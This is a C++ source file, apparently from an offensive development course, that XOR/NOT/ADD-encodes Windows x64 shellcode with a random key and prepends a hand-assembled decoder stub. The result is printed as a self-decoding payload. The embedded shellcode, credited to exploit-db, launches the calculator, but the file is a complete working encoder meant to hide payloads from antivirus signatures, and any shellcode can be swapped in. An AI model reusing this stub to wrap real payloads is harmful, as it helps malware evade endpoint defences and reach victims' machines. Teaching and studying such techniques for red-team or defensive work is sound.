Example C++ shellcode decoder stub using XOR, NOT, ADD operations to obfuscate and encode a calculator payload.

Obfuscation_Stub.cpp

# White Knight Labs
# Offensive Development Course - Shellcode Decoder Stub
# Author: Stigs

#include <iostream>
#include <vector>
#include <iomanip>
#include <random>

// Modified function to apply obfuscation on shellcode using a dynamic XOR value
void obfuscateBytes(std::vector<char>& data, unsigned char randomXorValue) {
    for (char& byte : data) {
        byte = ~((byte ^ randomXorValue) + 1);
    }
}

int main() {
	
	std::random_device rd; // Obtain a random number from hardware
    std::mt19937 gen(rd()); // Seed the generator
    std::uniform_int_distribution<> distr(0, 0xFF); // Updated range to 0x00 to 0xFF

    // Generate a random hexadecimal value within the specified range
    unsigned char randomHexValue = static_cast<unsigned char>(distr(gen));
	
	// Shellcode Link - Calc - https://www.exploit-db.com/exploits/51634
	
std::vector<char> shellcode = {
    '\x48', '\x31', '\xd2', '\x65', '\x48', '\x8b', '\x42', '\x60', '\x48', '\x8b', '\x70', '\x18', '\x48', '\x8b', '\x76', '\x20',
    '\x4c', '\x8b', '\x0e', '\x4d', '\x8b', '\x09', '\x4d', '\x8b', '\x49', '\x20', '\xeb', '\x63', '\x41', '\x8b', '\x49', '\x3c',
    '\x4d', '\x31', '\xff', '\x41', '\xb7', '\x88', '\x4d', '\x01', '\xcf', '\x49', '\x01', '\xcf', '\x45', '\x8b', '\x3f', '\x4d',
    '\x01', '\xcf', '\x41', '\x8b', '\x4f', '\x18', '\x45', '\x8b', '\x77', '\x20', '\x4d', '\x01', '\xce', '\xe3', '\x3f', '\xff',
    '\xc9', '\x48', '\x31', '\xf6', '\x41', '\x8b', '\x34', '\x8e', '\x4c', '\x01', '\xce', '\x48', '\x31', '\xc0', '\x48', '\x31',
    '\xd2', '\xfc', '\xac', '\x84', '\xc0', '\x74', '\x07', '\xc1', '\xca', '\x0d', '\x01', '\xc2', '\xeb', '\xf4', '\x44', '\x39',
    '\xc2', '\x75', '\xda', '\x45', '\x8b', '\x57', '\x24', '\x4d', '\x01', '\xca', '\x41', '\x0f', '\xb7', '\x0c', '\x4a', '\x45',
    '\x8b', '\x5f', '\x1c', '\x4d', '\x01', '\xcb', '\x41', '\x8b', '\x04', '\x8b', '\x4c', '\x01', '\xc8', '\xc3', '\xc3', '\x41',
    '\xb8', '\x98', '\xfe', '\x8a', '\x0e', '\xe8', '\x92', '\xff', '\xff', '\xff', '\x48', '\x31', '\xc9', '\x51', '\x48', '\xb9',
    '\x63', '\x61', '\x6c', '\x63', '\x2e', '\x65', '\x78', '\x65', '\x51', '\x48', '\x8d', '\x0c', '\x24', '\x48', '\x31', '\xd2',
    '\x48', '\xff', '\xc2', '\x48', '\x83', '\xec', '\x28', '\xff', '\xd0'
};

	
	// Apply obfuscation to the shellcode using the random value
    obfuscateBytes(shellcode, randomHexValue);

    // Shellcode size for dynamically updating the decoder stub
    size_t shellcodeSize = shellcode.size();

    // Decoder stub with a placeholder for shellcode size
    std::vector<char> decoderStub = {
        // '\xcc', // INT 3 - Breakpoint - Uncomment if needed
        '\xbe', // Moving to next byte for size placeholder
        static_cast<char>(shellcodeSize & 0xFF), // Least significant byte (LSB) of the size
        static_cast<char>((shellcodeSize >> 8) & 0xFF),
        static_cast<char>((shellcodeSize >> 16) & 0xFF),
        static_cast<char>((shellcodeSize >> 24) & 0xFF), // Most significant byte (MSB) of the size
        // The rest of the decoder stub instructions
        '\x48', '\x8d', '\x3d', '\x16', '\x00', '\x00', '\x00',
        '\x48', '\x85', '\xf6', '\x74', '\x11',
        '\x48', '\xff', '\xce', '\x8a', '\x04', '\x37', '\xf6',
        '\xd0', '\xfe', '\xc8', '\x34', static_cast<char>(randomHexValue), '\x88', '\x04',
        '\x37', '\xeb', '\xea', 
    };

    // Combine the decoder stub with the obfuscated shellcode
    std::vector<char> combinedData = decoderStub;
    combinedData.insert(combinedData.end(), shellcode.begin(), shellcode.end());

    // Print the obfuscated shellcode with the decoder stub
    std::cout << "Obfuscated Shellcode with Decoder Stub: ";
    for (const char& byte : combinedData) {
        std::cout << "\\x" << std::hex << std::setw(2) << std::setfill('0') << (0xFF & static_cast<int>(byte));
    }
    std::cout << std::endl;

    return 0;
}